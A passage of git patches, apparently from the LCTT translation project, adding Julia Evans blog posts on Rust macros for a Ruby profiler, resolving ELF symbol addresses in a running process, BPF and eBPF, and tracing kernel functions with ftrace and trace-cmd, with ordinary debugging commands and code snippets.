+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // insert code here
+ }
+}
+pub mod ruby_2_1_4 {
+ use bindings::ruby_2_1_4::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+pub mod ruby_2_1_5 {
+ use bindings::ruby_2_1_5::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+pub mod ruby_2_1_6 {
+ use bindings::ruby_2_1_6::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // same code
+ }
+}
+
+```
+
+### macros to the rescue!
+
+This really repetitive thing I wanted to do was a GREAT fit for macros. Here’s what using `macro_rules!` to do this looked like!
+
+```
+macro_rules! ruby_bindings(
+ ($ruby_version:ident) => (
+ pub mod $ruby_version {
+ use bindings::$ruby_version::{rb_control_frame_struct, rb_thread_t, RString};
+ fn get_stack_trace(pid: pid_t) -> Vec {
+ // insert code here
+ }
+ }
+));
+
+```
+
+I basically just needed to put my code in and insert `$ruby_version` in the places I wanted it to go in. So simple! I literally just looked at an example, tried the first thing I thought would work, and it worked pretty much right away.
+
+(the [actual code][5] is more lines and messier but the usage of macros is exactly as simple as in this example)
+
+I was SO HAPPY about this because I’d been worried getting this to work would be hard but instead it was so easy!!
+
+### dispatching to the right code
+
+Then I wrote some super simple dispatch code to call the right code depending on which Ruby version was running!
+
+```
+ let version = get_api_version(pid);
+ let stack_trace_function = match version.as_ref() {
+ "2.1.1" => stack_trace::ruby_2_1_1::get_stack_trace,
+ "2.1.2" => stack_trace::ruby_2_1_2::get_stack_trace,
+ "2.1.3" => stack_trace::ruby_2_1_3::get_stack_trace,
+ "2.1.4" => stack_trace::ruby_2_1_4::get_stack_trace,
+ "2.1.5" => stack_trace::ruby_2_1_5::get_stack_trace,
+ "2.1.6" => stack_trace::ruby_2_1_6::get_stack_trace,
+ "2.1.7" => stack_trace::ruby_2_1_7::get_stack_trace,
+ "2.1.8" => stack_trace::ruby_2_1_8::get_stack_trace,
+ // and like 20 more versions
+ _ => panic!("OH NO OH NO OH NO"),
+ };
+
+```
+
+### it works!
+
+I tried out my prototype, and it totally worked! The same program could get stack traces out of the running Ruby program for all of the ~10 different Ruby versions I tried – it figured out which Ruby version was running, called the right code, and got me stack traces!!
+
+Previously I’d compile a version for Ruby 2.2.0 but then if I tried to use it for any other Ruby version it would crash, so this was a huge improvement.
+
+There are still more issues with this approach that I need to sort out. The two main ones right now are: firstly the ruby binary that ships with Debian doesn’t have symbols and I need the address of the current thread, and secondly it’s still possible that `#ifdefs` will ruin my day.
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/12/24/my-first-rust-macro/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/categories/ruby-profiler
+[2]:https://gist.github.com/jfager/5936197
+[3]:https://www.ncameron.org/blog/macros-in-rust-pt1/
+[4]:https://www.ncameron.org/blog/macros-in-rust-pt2/
+[5]:https://github.com/jvns/ruby-stacktrace/blob/b0b92863564e54da59ea7f066aff5bb0d92a4968/src/lib.rs#L249-L393
From 5c315017c152d5cb566ef579f9df293530451058 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:42:02 +0800
Subject: [PATCH 305/371] =?UTF-8?q?20180113-5=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ures resolving symbol addresses is hard.md | 163 ++++++++++++++++++
1 file changed, 163 insertions(+)
create mode 100644 sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
diff --git a/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md b/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
new file mode 100644
index 0000000000..971f575f5f
--- /dev/null
+++ b/sources/tech/20180109 Profiler adventures resolving symbol addresses is hard.md
@@ -0,0 +1,163 @@
+Profiler adventures: resolving symbol addresses is hard!
+============================================================
+
+The other day I posted [How does gdb call functions?][1]. In that post I said:
+
+> Using the symbol table to figure out the address of the function you want to call is pretty straightforward
+
+Unsurprisingly, it turns out that figuring out the address in memory corresponding to a given symbol is actually not really that straightforward. This is actually something I’ve been doing in my profiler, and I think it’s interesting, so I thought I’d write about it!
+
+Basically the problem I’ve been trying to solve is – I have a symbol (like `ruby_api_version`), and I want to figure out which address that symbol is mapped to in my target process’s memory (so that I can get the data in it, like the Ruby process’s Ruby version). So far I’ve run into (and fixed!) 3 issues when trying to do this:
+
+1. When binaries are loaded into memory, they’re loaded at a random address (so I can’t just read the symbol table)
+
+2. The symbol I want isn’t necessarily in the “main” binary (`/proc/PID/exe`) – sometimes it’s in some other dynamically linked library
+
+3. I need to look at the ELF program header to adjust which address I look at for the symbol
+
+I’ll start with some background, and then explain these 3 things! (I actually don’t know what gdb does)
+
+### what’s a symbol?
+
+Most binaries have functions and variables in them. For instance, Perl has a global variable called `PL_bincompat_options` and a function called `Perl_sv_catpv_mg`.
+
+Sometimes binaries need to look up functions from another binary (for example, if the binary is a dynamically linked library, you need to look up its functions by name). Also sometimes you’re debugging your code and you want to know what function an address corresponds to.
+
+Symbols are how you look up functions / variables in a binary. They’re in a section called the “symbol table”. The symbol table is basically an index for your binary! Sometimes they’re missing (“stripped”). There are a lot of binary formats, but this post is just about the usual binary format on Linux: ELF.
+
+### how do you get the symbol table of a binary?
+
+A thing that I learned today (or at least learned and then forgot) is that there are 2 possible sections symbols can live in: `.symtab` and `.dynsym`. `.dynsym` is the “dynamic symbol table”. According to [this page][2], the dynsym is a smaller version of the symtab that only contains global symbols.
+
+There are at least 3 ways to read the symbol table of a binary on Linux: you can use nm, objdump, or readelf.
+
+* **read the .symtab**: `nm $FILE`, `objdump --syms $FILE`, `readelf -a $FILE`
+
+* **read the .dynsym**: `nm -D $FILE`, `objdump --dynamic-syms $FILE`, `readelf -a $FILE`
+
+`readelf -a` is the same in both cases because `readelf -a` just shows you everything in an ELF file. It’s my favorite because I don’t need to guess where the information I want is, I can just print out everything and then use grep.
+
+Here’s an example of some of the symbols in `/usr/bin/perl`. You can see that each symbol has a **name**, a **value**, and a **type**. The value is basically the offset of the code/data corresponding to that symbol in the binary. (except some symbols have value 0. I think that has something to do with dynamic linking but I don’t understand it so we’re not going to get into it)
+
+```
+$ readelf -a /usr/bin/perl
+...
+ Num: Value Size Type Ndx Name
+ 523: 00000000004d6590 49 FUNC 14 Perl_sv_catpv_mg
+ 524: 0000000000543410 7 FUNC 14 Perl_sv_copypv
+ 525: 00000000005a43e0 202 OBJECT 16 PL_bincompat_options
+ 526: 00000000004e6d20 2427 FUNC 14 Perl_pp_ucfirst
+ 527: 000000000044a8c0 1561 FUNC 14 Perl_Gv_AMupdate
+...
+
+```
+
+### the question we want to answer: what address is a symbol mapped to?
+
+That’s enough background!
+
+Now – suppose I’m a debugger, and I want to know what address the `ruby_api_version` symbol is mapped to. Let’s use readelf to look at the relevant Ruby binary!
+
+```
+readelf -a ~/.rbenv/versions/2.1.6/bin/ruby | grep ruby_api_version
+ 365: 00000000001f9180 12 OBJECT GLOBAL DEFAULT 15 ruby_api_version
+
+```
+
+Neat! The offset of `ruby_api_version` is `0x1f9180`. We’re done, right? Of course not! :)
+
+### Problem 1: ASLR (Address space layout randomization)
+
+Here’s the first issue: when Linux loads a binary into memory (like `~/.rbenv/versions/2.1.6/bin/ruby`), it doesn’t just load it at the `0` address. Instead, it usually adds a random offset. Wikipedia’s article on ASLR explains why:
+
+> Address space layout randomization (ASLR) is a memory-protection process for operating systems (OSes) that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.
+
+We can see this happening in practice: I started `/home/bork/.rbenv/versions/2.1.6/bin/ruby` 3 times and every time the process gets mapped to a different place in memory. (`0x56121c86f000`, `0x55f440b43000`, `0x56163334a000`)
+
+Here we’re meeting our good friend `/proc/$PID/maps` – this file contains a list of memory maps for a process. The memory maps tell us every address range in the process’s virtual memory (it turns out virtual memory isn’t contiguous! Instead a process gets a bunch of possibly-disjoint memory maps!). This file is so useful! You can find the address of the stack, the heap, every dynamically loaded library, anonymous memory maps, and probably more.
+
+```
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+56121c86f000-56121caf0000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+56121ccf0000-56121ccf5000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+56121ccf5000-56121ccf7000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+55f440b43000-55f440dc4000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+55f440fc4000-55f440fc9000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+55f440fc9000-55f440fcb000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+$ cat /proc/(pgrep -f 2.1.6)/maps | grep 'bin/ruby'
+56163334a000-5616335cb000 r-xp 00000000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5616337cb000-5616337d0000 r--p 00281000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+5616337d0000-5616337d2000 rw-p 00286000 00:32 323508 /home/bork/.rbenv/versions/2.1.6/bin/ruby
+
+```
+
+Okay, so in the last example we see that our binary is mapped at `0x56163334a000`. If we combine this with the knowledge that `ruby_api_version` is at `0x1f9180`, then that means that we just need to look at the address `0x1f9180 + 0x56163334a000` to find our variable, right?
+
+Yes! In this case, that works. But in other cases it won’t! So that brings us to problem 2.
+
+### Problem 2: dynamically loaded libraries
+
+Next up, I tried running system Ruby: `/usr/bin/ruby`. This binary has basically no symbols at all! Disaster! In particular it does not have a `ruby_api_version` symbol.
+
+But when I tried to print the `ruby_api_version` variable with gdb, it worked!!! Where was gdb finding my symbol? I found the answer with the help of our good friend: `/proc/PID/maps`
+
+It turns out that `/usr/bin/ruby` dynamically loads a library called `libruby-2.3`. You can see it in the memory maps here:
+
+```
+$ cat /proc/(pgrep -f /usr/bin/ruby)/maps | grep libruby
+7f2c5d789000-7f2c5d9f1000 r-xp 00000000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5d9f1000-7f2c5dbf0000 ---p 00268000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5dbf0000-7f2c5dbf6000 r--p 00267000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+7f2c5dbf6000-7f2c5dbf7000 rw-p 0026d000 00:14 /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0
+
+```
+
+And if we read it with `readelf`, we find the address of that symbol!
+
+```
+readelf -a /usr/lib/x86_64-linux-gnu/libruby-2.3.so.2.3.0 | grep ruby_api_version
+ 374: 00000000001c72f0 12 OBJECT GLOBAL DEFAULT 13 ruby_api_version
+
+```
+
+So in this case the address of the symbol we want is `0x7f2c5d789000` (the start of the libruby-2.3 memory map) plus `0x1c72f0`. Nice! But we’re still not done. There is (at least) one more mystery!
+
+### Problem 3: the `vaddr` offset in the ELF program header
+
+This one I just figured out today so it’s the one I have the shakiest understanding of. Here’s what happened.
+
+I was running system ruby on Ubuntu 14.04: Ruby 1.9.3. And my usual code (find the libruby map, get its address, get the symbol offset, add them up) wasn’t working!!! I was confused.
+
+But I’d asked Julian if he knew of any weird stuff I need to worry about a while back and he said “well, you should read the code for `dlsym`, you’re trying to do basically the same thing”. So I decided to, instead of randomly guessing, go read the code for `dlsym`.
+
+The man page for `dlsym` says “dlsym, dlvsym - obtain address of a symbol in a shared object or executable”. Perfect!!
+
+[Here’s the dlsym code from musl I read][3]. (musl is like glibc, but, different. Maybe easier to read? I don’t understand it that well.)
+
+The dlsym code says (on line 1468) `return def.dso->base + def.sym->st_value;` That sounds like what I’m doing!! But what’s `dso->base`? It looks like `base = map - addr_min;`, and `addr_min = ph->p_vaddr;`. (there’s also some stuff that makes sure `addr_min` is aligned with the page size which I should maybe pay attention to.)
+
+So the code I want is something like `map_base - ph->p_vaddr + sym->st_value`.
+
+I looked up this `vaddr` thing in the ELF program header, subtracted it from my calculation, and voilà! It worked!!!
+
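+Here’s a sketch of that whole calculation in C, reading the program headers straight out of the ELF file. It assumes a 64-bit ELF, skips error handling, and `symbol_address` is a made-up helper, so treat it as an illustration of `map_base - p_vaddr + st_value` rather than production code:
+
+```
+#include <elf.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+/* hypothetical helper: map_base comes from /proc/PID/maps, st_value from the
+   symbol table (readelf/nm); we need p_vaddr of the first PT_LOAD segment */
+unsigned long symbol_address(const char *elf_path, unsigned long map_base,
+                             unsigned long st_value) {
+    FILE *f = fopen(elf_path, "rb");
+    if (!f) { perror("fopen"); exit(1); }
+
+    Elf64_Ehdr ehdr;
+    fread(&ehdr, sizeof(ehdr), 1, f);
+
+    unsigned long vaddr = 0;
+    for (int i = 0; i < ehdr.e_phnum; i++) {
+        Elf64_Phdr phdr;
+        fseek(f, ehdr.e_phoff + (long)i * ehdr.e_phentsize, SEEK_SET);
+        fread(&phdr, sizeof(phdr), 1, f);
+        if (phdr.p_type == PT_LOAD) {          /* first loadable segment */
+            vaddr = phdr.p_vaddr;
+            break;
+        }
+    }
+    fclose(f);
+    return map_base - vaddr + st_value;
+}
+```
+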
+### there are probably more problems!
+
+I imagine I will discover even more ways that I am calculating the symbol address wrong. It’s interesting that such a seemingly simple thing (“what’s the address of this symbol?”) is so complicated!
+
+It would be nice to be able to just call `dlsym` and have it do all the right calculations for me, but I think I can’t because the symbol is in a different process. Maybe I’m wrong about that though! I would like to be wrong about that. If you know an easier way to do all this I would very much like to know!
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2018/01/09/resolving-symbol-addresses/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca
+[1]:https://jvns.ca/blog/2018/01/04/how-does-gdb-call-functions/
+[2]:https://blogs.oracle.com/ali/inside-elf-symbol-tables
+[3]:https://github.com/esmil/musl/blob/194f9cf93da8ae62491b7386edf481ea8565ae4e/src/ldso/dynlink.c#L1451
From 166be2bb0d2c6c6e94e72709f0dcc43c3c7a8a05 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:44:00 +0800
Subject: [PATCH 306/371] =?UTF-8?q?20180113-6=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20170628 Notes on BPF and eBPF.md | 152 ++++++++++++++++++
1 file changed, 152 insertions(+)
create mode 100644 sources/tech/20170628 Notes on BPF and eBPF.md
diff --git a/sources/tech/20170628 Notes on BPF and eBPF.md b/sources/tech/20170628 Notes on BPF and eBPF.md
new file mode 100644
index 0000000000..264319bf97
--- /dev/null
+++ b/sources/tech/20170628 Notes on BPF and eBPF.md
@@ -0,0 +1,152 @@
+Notes on BPF & eBPF
+============================================================
+
+Today it was Papers We Love, my favorite meetup! Today [Suchakra Sharma][6] ([@tuxology][7] on twitter/github) gave a GREAT talk about the original BPF paper and recent work in Linux on eBPF. It really made me want to go write eBPF programs!
+
+The paper is [The BSD Packet Filter: A New Architecture for User-level Packet Capture][8]
+
+I wanted to write some notes on the talk here because I thought it was super super good.
+
+To start, here are the [slides][9] and a [pdf][10]. The pdf is good because there are links at the end and in the PDF you can click the links.
+
+### what’s BPF?
+
+Before BPF, if you wanted to do packet filtering you had to copy all the packets into userspace and then filter them there (with “tap”).
+
+this had 2 problems:
+
+1. if you filter in userspace, it means you have to copy all the packets into userspace, copying data is expensive
+
+2. the filtering algorithms people were using were inefficient
+
+The solution to problem #1 seems sort of obvious, move the filtering logic into the kernel somehow. Okay. (though the details of how that’s done aren’t obvious, we’ll talk about that in a second)
+
+But why were the filtering algorithms inefficient! Well!!
+
+If you run `tcpdump host foo` it actually runs a relatively complicated query, which you could represent with this tree:
+
+![](https://jvns.ca/images/bpf-1.png)
+
+Evaluating this tree is kind of expensive. So the first insight is that you can actually represent this tree in a simpler way, like this:
+
+![](https://jvns.ca/images/bpf-2.png)
+
+Then if you have `ether.type = IP` and `ip.src = foo` you automatically know that the packet matches `host foo`, you don’t need to check anything else. So this data structure (they call it a “control flow graph” or “CFG”) is a way better representation of the program you actually want to execute to check matches than the tree we started with.
+
+### How BPF works in the kernel
+
+The main important thing here is that packets are just arrays of bytes. BPF programs run on these arrays of bytes. They’re not allowed to have loops but they _can_ have smart stuff to figure out the length of the IP header (IPv6 & IPv4 are different lengths!) and then find the TCP port based on that length
+
+```
+x = ip_header_length
+port = *(packet_start + x + port_offset)
+
+```
+
+(it looks different from that but it’s basically the same). There’s a nice description of the virtual machine in the paper/slides so I won’t explain it.
+
+When you run `tcpdump host foo` this is what happens, as far as I understand:
+
+1. convert `host foo` into an efficient DAG of the rules
+
+2. convert that DAG into a BPF program (in BPF bytecode) for the BPF virtual machine
+
+3. Send the BPF bytecode to the Linux kernel, which verifies it (there’s a rough sketch of this step right after this list)
+
+4. compile the BPF bytecode program into native code. For example [here’s the JIT code for ARM][1] and for [x86][2]
+
+5. when packets come in, Linux runs the native code to decide if that packet should be filtered or not. It’ll often run only 100-200 CPU instructions for each packet that needs to be processed, which is super fast!
+
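+To make step 3 a little more concrete, here’s a minimal sketch of handing a classic BPF program to the kernel from C, using a raw socket and `SO_ATTACH_FILTER`. This isn’t from the talk or the paper, the filter is hand-assembled, it needs root, and real tcpdump goes through libpcap, so treat it as a shape-of-the-thing example:
+
+```
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <linux/filter.h>
+#include <linux/if_ether.h>
+
+int main(void) {
+    /* classic BPF bytecode: load the 2-byte ethertype at offset 12, accept
+       the whole packet if it's IPv4, drop it otherwise */
+    struct sock_filter code[] = {
+        { 0x28, 0, 0, 12 },           /* ldh [12]                 */
+        { 0x15, 0, 1, ETH_P_IP },     /* jeq #0x0800, keep, drop  */
+        { 0x06, 0, 0, 0xffffffff },   /* keep: return whole packet */
+        { 0x06, 0, 0, 0 },            /* drop: return 0            */
+    };
+    struct sock_fprog prog = { .len = 4, .filter = code };
+
+    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (fd < 0) { perror("socket"); return 1; }
+
+    /* this is the "send the bytecode to the kernel" step: the kernel checks
+       the program and then runs it on every packet that hits this socket */
+    if (setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) < 0) {
+        perror("setsockopt");
+        return 1;
+    }
+    printf("filter attached; only IPv4 packets will be delivered\n");
+    return 0;
+}
+```
+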
+### the present: eBPF
+
+But BPF has been around for a long time! Now we live in the EXCITING FUTURE which is eBPF. I’d heard about eBPF a bunch before but I felt like this helped me put the pieces together a little better. (I wrote this [XDP & eBPF post][11] back in April when I was at netdev)
+
+some facts about eBPF:
+
+* eBPF programs have their own bytecode language, and are compiled from that bytecode language into native code in the kernel, just like BPF programs
+
+* eBPF programs run in the kernel
+
+* eBPF programs can’t access arbitrary kernel memory. Instead the kernel provides functions to get at some restricted subset of things.
+
+* they _can_ communicate with userspace programs through BPF maps
+
+* there’s a `bpf` syscall as of Linux 3.18
+
+### kprobes & eBPF
+
+You can pick a function (any function!) in the Linux kernel and execute a program that you write every time that function happens. This seems really amazing and magical.
+
+For example! There’s this [BPF program called disksnoop][12] which tracks when you start/finish writing a block to disk. Here’s a snippet from the code:
+
+```
+BPF_HASH(start, struct request *);
+void trace_start(struct pt_regs *ctx, struct request *req) {
+ // stash start timestamp by request ptr
+ u64 ts = bpf_ktime_get_ns();
+ start.update(&req, &ts);
+}
+...
+b.attach_kprobe(event="blk_start_request", fn_name="trace_start")
+b.attach_kprobe(event="blk_mq_start_request", fn_name="trace_start")
+
+```
+
+This basically declares a BPF hash (which the program uses to keep track of when the request starts / finishes), a function called `trace_start` which is going to be compiled into BPF bytecode, and attaches `trace_start` to the `blk_start_request` kernel function.
+
+This is all using the `bcc` framework which lets you write Python-ish programs that generate BPF code. You can find it (it has tons of example programs) at [https://github.com/iovisor/bcc][13]
+
+### uprobes & eBPF
+
+So I sort of knew you could attach eBPF programs to kernel functions, but I didn’t realize you could attach eBPF programs to userspace functions! That’s really exciting. Here’s [an example of counting malloc calls in Python using an eBPF program][14].
+
+### things you can attach eBPF programs to
+
+* network cards, with XDP (which I wrote about a while back)
+
+* tc egress/ingress (in the network stack)
+
+* kprobes (any kernel function)
+
+* uprobes (any userspace function apparently ?? like in any C program with symbols.)
+
+* probes that were built for dtrace called “USDT probes” (like [these mysql probes][3]). Here’s an [example program using dtrace probes][4]
+
+* [the JVM][5]
+
+* tracepoints (not sure what that is yet)
+
+* seccomp / landlock security things
+
+* a bunch more things
+
+### this talk was super cool
+
+There are a bunch of great links in the slides and in [LINKS.md][15] in the iovisor repository. It is late now but soon I want to actually write my first eBPF program!
+
+--------------------------------------------------------------------------------
+
+via: https://jvns.ca/blog/2017/06/28/notes-on-bpf---ebpf/
+
+作者:[Julia Evans ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://jvns.ca/
+[1]:https://github.com/torvalds/linux/blob/v4.10/arch/arm/net/bpf_jit_32.c#L512
+[2]:https://github.com/torvalds/linux/blob/v3.18/arch/x86/net/bpf_jit_comp.c#L189
+[3]:https://dev.mysql.com/doc/refman/5.7/en/dba-dtrace-ref-query.html
+[4]:https://github.com/iovisor/bcc/blob/master/examples/tracing/mysqld_query.py
+[5]:http://blogs.microsoft.co.il/sasha/2016/03/31/probing-the-jvm-with-bpfbcc/
+[6]:http://suchakra.in/
+[7]:https://twitter.com/tuxology
+[8]:http://www.vodun.org/papers/net-papers/van_jacobson_the_bpf_packet_filter.pdf
+[9]:https://speakerdeck.com/tuxology/the-bsd-packet-filter
+[10]:http://step.polymtl.ca/~suchakra/PWL-Jun28-MTL.pdf
+[11]:https://jvns.ca/blog/2017/04/07/xdp-bpf-tutorial/
+[12]:https://github.com/iovisor/bcc/blob/0c8c179fc1283600887efa46fe428022efc4151b/examples/tracing/disksnoop.py
+[13]:https://github.com/iovisor/bcc
+[14]:https://github.com/iovisor/bcc/blob/00f662dbea87a071714913e5c7382687fef6a508/tests/lua/test_uprobes.lua
+[15]:https://github.com/iovisor/bcc/blob/master/LINKS.md
From 4757374a5f3c8c320b3cc99a2179b402bf7c49b3 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:46:19 +0800
Subject: [PATCH 307/371] =?UTF-8?q?20180113-7=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0319 ftrace trace your kernel functions.md | 284 ++++++++++++++++++
1 file changed, 284 insertions(+)
create mode 100644 sources/tech/20170319 ftrace trace your kernel functions.md
diff --git a/sources/tech/20170319 ftrace trace your kernel functions.md b/sources/tech/20170319 ftrace trace your kernel functions.md
new file mode 100644
index 0000000000..0ff3fd6416
--- /dev/null
+++ b/sources/tech/20170319 ftrace trace your kernel functions.md
@@ -0,0 +1,284 @@
+ftrace: trace your kernel functions!
+============================================================
+
+Hello! Today we’re going to talk about a debugging tool we haven’t talked about much before on this blog: ftrace. What could be more exciting than a new debugging tool?!
+
+Better yet, ftrace isn’t new! It’s been around since Linux kernel 2.6, or about 2008. [here’s the earliest documentation I found with some quick Googling][10]. So you might be able to use it even if you’re debugging an older system!
+
+I’ve known that ftrace exists for about 2.5 years now, but hadn’t gotten around to really learning it yet. I’m supposed to run a workshop tomorrow where I talk about ftrace, so today is the day we talk about it!
+
+### what’s ftrace?
+
+ftrace is a Linux kernel feature that lets you trace Linux kernel function calls. Why would you want to do that? Well, suppose you’re debugging a weird problem, and you’ve gotten to the point where you’re staring at the source code for your kernel version and wondering what **exactly** is going on.
+
+I don’t read the kernel source code very often when debugging, but occasionally I do! For example this week at work we had a program that was frozen and stuck spinning inside the kernel. Looking at what functions were being called helped us understand better what was happening in the kernel and what systems were involved (in that case, it was the virtual memory system)!
+
+I think ftrace is a bit of a niche tool (it’s definitely less broadly useful and harder to use than strace) but that it’s worth knowing about. So let’s learn about it!
+
+### first steps with ftrace
+
+Unlike strace and perf, ftrace isn’t a **program** exactly – you don’t just run `ftrace my_cool_function`. That would be too easy!
+
+If you read [Debugging the kernel using Ftrace][11] it starts out by telling you to `cd /sys/kernel/debug/tracing` and then do various filesystem manipulations.
+
+For me this is way too annoying – a simple example of using ftrace this way is something like
+
+```
+cd /sys/kernel/debug/tracing
+echo function > current_tracer
+echo do_page_fault > set_ftrace_filter
+cat trace
+
+```
+
+This filesystem interface to the tracing system (“put values in these magic files and things will happen”) seems theoretically possible to use but really not my preference.
+
+Luckily, team ftrace also thought this interface wasn’t that user friendly and so there is an easier-to-use interface called **trace-cmd**!!! trace-cmd is a normal program with command line arguments. We’ll use that! I found an intro to trace-cmd on LWN at [trace-cmd: A front-end for Ftrace][12].
+
+### getting started with trace-cmd: let’s trace just one function
+
+First, I needed to install `trace-cmd` with `sudo apt-get install trace-cmd`. Easy enough.
+
+For this first ftrace demo, I decided I wanted to know when my kernel was handling a page fault. When Linux allocates memory, it often does it lazily (“you weren’t _really_ planning to use that memory, right?”). This means that when an application tries to actually write to memory that it allocated, there’s a page fault and the kernel needs to give the application physical memory to use.
+
+Let’s start `trace-cmd` and make it trace the `do_page_fault` function!
+
+```
+$ sudo trace-cmd record -p function -l do_page_fault
+ plugin 'function'
+Hit Ctrl^C to stop recording
+
+```
+
+I ran it for a few seconds and then hit `Ctrl+C`. Awesome! It created a 2.5MB file called `trace.dat`. Let’s see what’s in that file!
+
+```
+$ sudo trace-cmd report
+ chrome-15144 [000] 11446.466121: function: do_page_fault
+ chrome-15144 [000] 11446.467910: function: do_page_fault
+ chrome-15144 [000] 11446.469174: function: do_page_fault
+ chrome-15144 [000] 11446.474225: function: do_page_fault
+ chrome-15144 [000] 11446.474386: function: do_page_fault
+ chrome-15144 [000] 11446.478768: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.480172: function: do_page_fault
+ chrome-1830 [003] 11446.486696: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.488983: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.489034: function: do_page_fault
+ CompositorTileW-15154 [001] 11446.489045: function: do_page_fault
+
+```
+
+This is neat – it shows me the process name (chrome), process ID (15144), CPU (000), and function that got traced.
+
+By looking at the whole report, (`sudo trace-cmd report | grep chrome`) I can see that we traced for about 1.5 seconds and in that time Chrome had about 500 page faults. Cool! We have done our first ftrace!
+
+### next ftrace trick: let’s trace a process!
+
+Okay, but just seeing one function is kind of boring! Let’s say I want to know everything that’s happening for one program. I use a static site generator called Hugo. What’s the kernel doing for Hugo?
+
+Hugo’s PID on my computer right now is 25314, so I recorded all the kernel functions with:
+
+```
+sudo trace-cmd record --help # I read the help!
+sudo trace-cmd record -p function -P 25314 # record for PID 25314
+
+```
+
+`sudo trace-cmd report` printed out 18,000 lines of output. If you’re interested, you can see [all 18,000 lines here][13].
+
+18,000 lines is a lot so here are some interesting excerpts.
+
+This looks like what happens when the `clock_gettime` system call runs. Neat!
+
+```
+ compat_SyS_clock_gettime
+ SyS_clock_gettime
+ clockid_to_kclock
+ posix_clock_realtime_get
+ getnstimeofday64
+ __getnstimeofday64
+ arch_counter_read
+ __compat_put_timespec
+
+```
+
+This is something related to process scheduling:
+
+```
+ cpufreq_sched_irq_work
+ wake_up_process
+ try_to_wake_up
+ _raw_spin_lock_irqsave
+ do_raw_spin_lock
+ _raw_spin_lock
+ do_raw_spin_lock
+ walt_ktime_clock
+ ktime_get
+ arch_counter_read
+ walt_update_task_ravg
+ exiting_task
+
+```
+
+Being able to see all these function calls is pretty cool, even if I don’t quite understand them.
+
+### “function graph” tracing
+
+There’s another tracing mode called `function_graph`. This is the same as the function tracer except that it instruments both entering _and_ exiting a function. [Here’s the output of that tracer][14]
+
+```
+sudo trace-cmd record -p function_graph -P 25314
+
+```
+
+Again, here’s a snippet (this time from the futex code)
+
+```
+ | futex_wake() {
+ | get_futex_key() {
+ | get_user_pages_fast() {
+ 1.458 us | __get_user_pages_fast();
+ 4.375 us | }
+ | __might_sleep() {
+ 0.292 us | ___might_sleep();
+ 2.333 us | }
+ 0.584 us | get_futex_key_refs();
+ | unlock_page() {
+ 0.291 us | page_waitqueue();
+ 0.583 us | __wake_up_bit();
+ 5.250 us | }
+ 0.583 us | put_page();
++ 24.208 us | }
+
+```
+
+We see in this example that `get_futex_key` gets called right after `futex_wake`. Is that what really happens in the source code? We can check!! [Here’s the definition of futex_wake in Linux 4.4][15] (my kernel version).
+
+I’ll save you a click: it looks like this:
+
+```
+static int
+futex_wake(u32 __user *uaddr, unsigned int flags, int nr_wake, u32 bitset)
+{
+ struct futex_hash_bucket *hb;
